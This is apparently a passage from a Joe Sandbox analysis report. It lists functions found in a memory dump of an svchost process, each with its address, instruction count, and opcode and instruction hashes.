                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78084e64bd516aca7650be8432384c471c06043c5b32438f98330f784f3c9979
                                • Instruction ID: d602b49524a433b672669e6ed90ee64108dcaa31398c45c42b4241a855f82967
                                • Opcode Fuzzy Hash: 78084e64bd516aca7650be8432384c471c06043c5b32438f98330f784f3c9979
                                • Instruction Fuzzy Hash: 3C316F72A00119BFCB18DBA5D894F9FBBB9FB88604F414169E905E7240DB30AE04CBA4
                                Function 03C2E388 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                • Instruction ID: d94e3241f14df824b99195e5a06dc60c619ac49e5fb7e3408dc31b5287d78757
                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                • Instruction Fuzzy Hash: 7431A935600654EFDB21DFA9C884F6ABBF8EF84354F1545A9E552DB290EB30EE02CB50
                                Function 03CAE609 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32e1360fe9bcb43cb04e30bb310682eb130285b7dce669081da6e533613295bd
                                • Instruction ID: d64bf5d7dfd3e84e340ee56485ac3c9cc53b63125e4356b676da0b02489d0ab0
                                • Opcode Fuzzy Hash: 32e1360fe9bcb43cb04e30bb310682eb130285b7dce669081da6e533613295bd
                                • Instruction Fuzzy Hash: E2319F75A0060ADFCB14DF2CC884DAEB7B6FF84308B154959E809DB390E771EA41CB94
                                Function 03D00591 Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4bfceeb4f380ca53bf5050c500052aaa58525543d78636be35501cbda3a1528a
                                • Instruction ID: 1edd8c6adf7fbd78d9672c17e4ca0fa5ec13917af8e25ef80a33223c8634e383
                                • Opcode Fuzzy Hash: 4bfceeb4f380ca53bf5050c500052aaa58525543d78636be35501cbda3a1528a
                                • Instruction Fuzzy Hash: E821F1326002059FD728CE29C884BBAB3A6EFD4B00F998478ED45CB2C5DB30F845CB90
                                Function 03C5F32A Relevance: .1, Instructions: 79COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                • Instruction ID: 29cf7b95959cb53ef771d741ea14790b2013baa10a1e5108de3038f28e2ed88c
                                • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                • Instruction Fuzzy Hash: CB218B72200300DFD71DDF15C445B6ABBE9EF95365F15816DE90ACF2A0EBB0E981CA98
                                Function 03CB06F1 Relevance: .1, Instructions: 79COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
                                • Instruction ID: d7283b03f35e924db2df2c6e24135d421fbaf87d967c32e58724f6b9ea097bd5
                                • Opcode Fuzzy Hash: 15fe22c4be1af1df33c71f673afd3974a7749117fae023c999d5ed66929e9545
                                • Instruction Fuzzy Hash: 70216D759002299BCB14DF59C881ABEB7F4FF48740F550069E941FB240D778AD52DBA0
                                Function 03CB019F Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
                                • Instruction ID: c8578b5c295a74410eb680d76ddedd4b50a501c69545903d37b65a6312dd23d8
                                • Opcode Fuzzy Hash: 9744420570fce007874bcda90de243c8342e87d9105de1592d7264e6eec7ffc3
                                • Instruction Fuzzy Hash: BF21DE75600654AFC715DB68C840F6AB7B8FF88740F140069F944DB7A0D738ED10CBA8
                                Function 03C69660 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
                                • Instruction ID: ffe5c17f2c318b0886737f139f23cd58459aea9f4bdea4820008e1001b50bff9
                                • Opcode Fuzzy Hash: ead08c21cb16d6130dfdea628e28c9e78456552765509942e8feda2f64c1f53f
                                • Instruction Fuzzy Hash: 7E213831200B05DBCF71EB29CC80B26B7A6FB51228F184659E893CE6E0D731E951DB95
                                Function 03CB0283 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                • Instruction ID: 3b14ed062cd254d373e38a403371b65222d070d7e71b8cb56929cc2b975137b5
                                • Opcode Fuzzy Hash: e6482c83a5375706eece5e1d2e47599cdc49c405468767ec440393c90a1c442e
                                • Instruction Fuzzy Hash: 7E21B0729043959BC711EFAAC848BABF7ECBF81240F094556BC90CB251D734DA48C6A2
                                Function 03CD71F9 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 196c02a169626d759812f76823989ce4560001bae03e1942783b56366c917ac1
                                • Instruction ID: 5fd5fa421666627e09124b7ce0314502f16aac9ccad733100acbe3898cc1d9c6
                                • Opcode Fuzzy Hash: 196c02a169626d759812f76823989ce4560001bae03e1942783b56366c917ac1
                                • Instruction Fuzzy Hash: 3E212531A04790CBC720EF258880B2BF7E9EFD5324F19492DF9A6DB140DB70BA858791
                                Function 03CAD0C0 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                • Instruction ID: 7151716367bd87fc38109b9659b81a9124d4c71da85cbebbf5ae455830022491
                                • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                • Instruction Fuzzy Hash: 5721F272644B01ABC311DF1DCC55B9BBBA4FB88724F05022EF946DB7A0D731D90197A9
                                Function 03D001AA Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                • Instruction ID: a1c996ebf0ed2adea8d9f8302c7b6fd04acadb1d4cad8cc842706384d237f455
                                • Opcode Fuzzy Hash: 7c026277872cc5e0963f605c228b607be8d88f840ed5543f7cdc629beb2de6ff
                                • Instruction Fuzzy Hash: A1210A712041905FDB45CB6A88F45B6BFE6EFC6215B0D82E6D984CB342C134D907C7A0
                                Function 03C6A30B Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                • Instruction ID: 27f5c82a5565e25999382ea02ce03eb21b1b659c17bf4b97bf2483c41d70d944
                                • Opcode Fuzzy Hash: 89bf6f1ecdc4212d89704b192355920728476dbc43691453b374e4ba4c73497a
                                • Instruction Fuzzy Hash: 4521AC79200B519FC724EF29C840B46B7F5AF98748F1884A8A909CB761E331E952CB94
                                Function 03CC80A8 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                • Instruction ID: 2aebb0b993bed23d9643834af7d72006999928796a2dde457193570ed4920502
                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                • Instruction Fuzzy Hash: 41216A76A00249AFDB12DF98CC40BAFBBF9EF88350F214459F901EB250D735DA509B50
                                Function 03C2B765 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                • Instruction ID: 5ce891571dc98ddac613f3b2bdf130e431b4938c489665424d675ac60399bc73
                                • Opcode Fuzzy Hash: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                • Instruction Fuzzy Hash: 51216936100B50DFC721EF68CA41F19BBB5FF18748F1A4968E40ADBAA1C734E910EB44
                                Function 03CFEE26 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                • Instruction ID: b42c0aaecd9f2253f29cbe90bc64f7fa5d9f73646468e13c0eddc4bf6e898cbb
                                • Opcode Fuzzy Hash: b626cd1ebd66efe2a1d26ed84b0573245269cba7ffd092eba36f048cde0aaa41
                                • Instruction Fuzzy Hash: B621B433A104119F9B18CF3DD804466F7F6EFDC31436A427AD912DB268D770BD118A84
                                Function 03C60124 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                • Instruction ID: 79f3aaedb7a8b465795239431ecbc90d82aac5a3843aa8395792b261d8fb5681
                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                • Instruction Fuzzy Hash: C311EF76604714BFD722DF85CC80FAABBB8EB80754F150029EA01EF180D676EE44DB60
                                Function 03C38770 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                • Instruction ID: 8cb1c64f987e00113935c51753b20611786dd810b9ca04f982739bc253d2492e
                                • Opcode Fuzzy Hash: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                • Instruction Fuzzy Hash: 99119D366007209BCB11CF59C480A6AF7EAAF4B750B198069FD08DF205D6B2EA0587A0
                                Function 03C33720 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                • Instruction ID: 34bf41746177b0029fa73b41e0f700f485751f5745eabdb2579ea796fd50c5d4
                                • Opcode Fuzzy Hash: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                • Instruction Fuzzy Hash: A8210779A003488BE725DF5DC5487EDB7B4FB8A318F2D8018C811DB2D0CBB89A45CB50
                                Function 03C380E9 Relevance: .1, Instructions: 66COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                • Instruction ID: 84826ca0f325f18bf7fd52bfbd9749b84de35f61435ddb4f8250a0f006d6b03b
                                • Opcode Fuzzy Hash: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                • Instruction Fuzzy Hash: A0215E75A00205DFCB14CF99C581AAEBBB5FB89314F24416DE105EB350C772AE0ACBD0
                                Function 03C6674D Relevance: .1, Instructions: 65COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                • Instruction ID: 845c494c502a3506b526fce0f5a4d5dc361e75d4b006c9b5069de135b4ec27fe
                                • Opcode Fuzzy Hash: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                • Instruction Fuzzy Hash: 69215675611B00EFC720DF69C881B66B3F8FF84250F44882DE5AACB650DA70AD60DBA0
                                Function 03C29240 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                • Instruction ID: d6501194c4f197e5688c8505e78efc7c54c0b4032946b35b9c91651946f318dd
                                • Opcode Fuzzy Hash: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                • Instruction Fuzzy Hash: 2211E27F010640EAD730FF56D901A727BA8EBB4B84F144065E800DB358E738DE01CB64
                                Function 03C666B0 Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                • Instruction ID: 7b6e3cd28f0ba25faa3acc23b8e4be216cb1aa7f326c0eafae0b4d01cd0efe48
                                • Opcode Fuzzy Hash: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                • Instruction Fuzzy Hash: 6F11CE76A01344EFCB24DF59D5C0A5ABBE8EF94650F1A8079E905DF310DA70DE10CBA0
                                Function 03CFFF09 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                • Instruction ID: 499c63169c64a662fd5881d3787f5bd2fa1a97c018c6ec8bba0f0120fbf4f6eb
                                • Opcode Fuzzy Hash: 5f629486d06ba5293cea0ab9bc75405e88b7907b4448fe1dd98bdb4fd1b5a73e
                                • Instruction Fuzzy Hash: 722152B2A502059FD754DF2AE884A42BBF5FB5D210B8585BAE90CCF24AE770D844CB90
                                Function 03C527ED Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                • Instruction ID: 216285a4be265a4151c83fff3c8e58c0bd757b409737cee5fba9f7763617fca9
                                • Opcode Fuzzy Hash: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                • Instruction Fuzzy Hash: 3D01043B605684ABE316E2AA9888F27B6DCEF80354F0A0465F800CF641DA14DC00C2A5
                                Function 03C5B052 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                • Instruction ID: fc9ceae544f2f69cfe9e299b11b543f30f60e535ea48e82adb84b581e6f3c20e
                                • Opcode Fuzzy Hash: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                • Instruction Fuzzy Hash: 3901D6B6B04300ABD710EBBA9C81F6BBAF8EFD4314F050029FA05CB141EA70ED409625
                                Function 03CED6F0 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                • Instruction ID: dc3f8c2c1362fd67af51a53ea278b205c6cab8a5bfdb9df6a0b0d0b4cd7c1785
                                • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                • Instruction Fuzzy Hash: 43018479700209BF9B15DBA6CA88DAFBBBDEF85A44F050059B916D7204E730EE41E760
                                Function 03C34690 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01afa505e28cd14948947aa6840df5776a4f49f4f9ec82641f0da71e55f4fb20
                                • Instruction ID: f8b6084924b56ee8d7609ecbc636c3716a98a344a08e3090609cf79bae5b3686
                                • Opcode Fuzzy Hash: 01afa505e28cd14948947aa6840df5776a4f49f4f9ec82641f0da71e55f4fb20
                                • Instruction Fuzzy Hash: 7611AC3A240744AFCB29CF5BD944F56BBA8EB87B65F094129F814CB290C770E940CFA0
                                Function 03C27330 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0371805163a40142a9f72563d0aa0a5c150e96b9a39e8d289908fb4be0fdd2d
                                • Instruction ID: 2ae2489ecaebfc5c11f32dcfd6ccb97e431c896b7b84a3b0d3d0a398ed5fcdb6
                                • Opcode Fuzzy Hash: a0371805163a40142a9f72563d0aa0a5c150e96b9a39e8d289908fb4be0fdd2d
                                • Instruction Fuzzy Hash: 0E11AC72600724AFD721CF69C881FABBBE8EB44304F054829EA85CB212D735ED00DBA1
                                Function 03C5F2D0 Relevance: .1, Instructions: 54COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11ce686bd11a5fa5cb7ab0631f49d35a5637918a498c97c399594c2f9427d430
                                • Instruction ID: 16e4867f3e562df9697a317669eceea4c055549a5c88e6fc18961f411820a10b
                                • Opcode Fuzzy Hash: 11ce686bd11a5fa5cb7ab0631f49d35a5637918a498c97c399594c2f9427d430
                                • Instruction Fuzzy Hash: CC11E575600B48DBD720DF69C844FAEBBA8FF44704F19047AE901EB241D679DA41D754
                                Function 03CC72A0 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                • Instruction ID: 6a05246b6a382eb46d89766d2c4463d9ade8907ebe2c8031bcbf153992ac6fd7
                                • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                • Instruction Fuzzy Hash: 6E01D27A240645BFD711EF16CC84E62F76DFF84391B054929F510CA560C721ACA0DAA4
                                Function 03C2A250 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                • Instruction ID: 12d3bba0c3323fe33c34916dca6f41ee620892b90c576c09fb6824eb1a21bf24
                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                • Instruction Fuzzy Hash: 1B01C475505721ABCB20CF159840A26BFA9EB45760705896DFC99CF680DB35E520DB60
                                Function 03C36259 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0ecdaad664d8ff89e5926c856896195afe6d87bc18b8b5a58e1d7f565c06378
                                • Instruction ID: 81856130d4f43588c913eb7038bbca9c8ca3bdd32b3c4722dd8931433d9c472a
                                • Opcode Fuzzy Hash: d0ecdaad664d8ff89e5926c856896195afe6d87bc18b8b5a58e1d7f565c06378
                                • Instruction Fuzzy Hash: 5C11AC75601328ABDB25EB24CC82FE8B378EF04710F5145D4A729EA0E0DB70AE91DF84
                                Function 03CAE1D0 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 279cf10a722991f2c3d68975938505885a14797f4699a1776130811fe816502a
                                • Instruction ID: 98b7fe9720cd3cea54cce483054075de9900f355f4205f5983535a0e25612986
                                • Opcode Fuzzy Hash: 279cf10a722991f2c3d68975938505885a14797f4699a1776130811fe816502a
                                • Instruction Fuzzy Hash: EA117936641740EFCB15EF29C980F56BBB8FF48B88F2500A5E905DF6A2C235ED01DA90
                                Function 03C3208A Relevance: .0, Instructions: 50COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                • Instruction ID: 0e3e33b9c58b64cf344593abda0f1ef420995afa2fc3a8f9efe2aacf16f29114
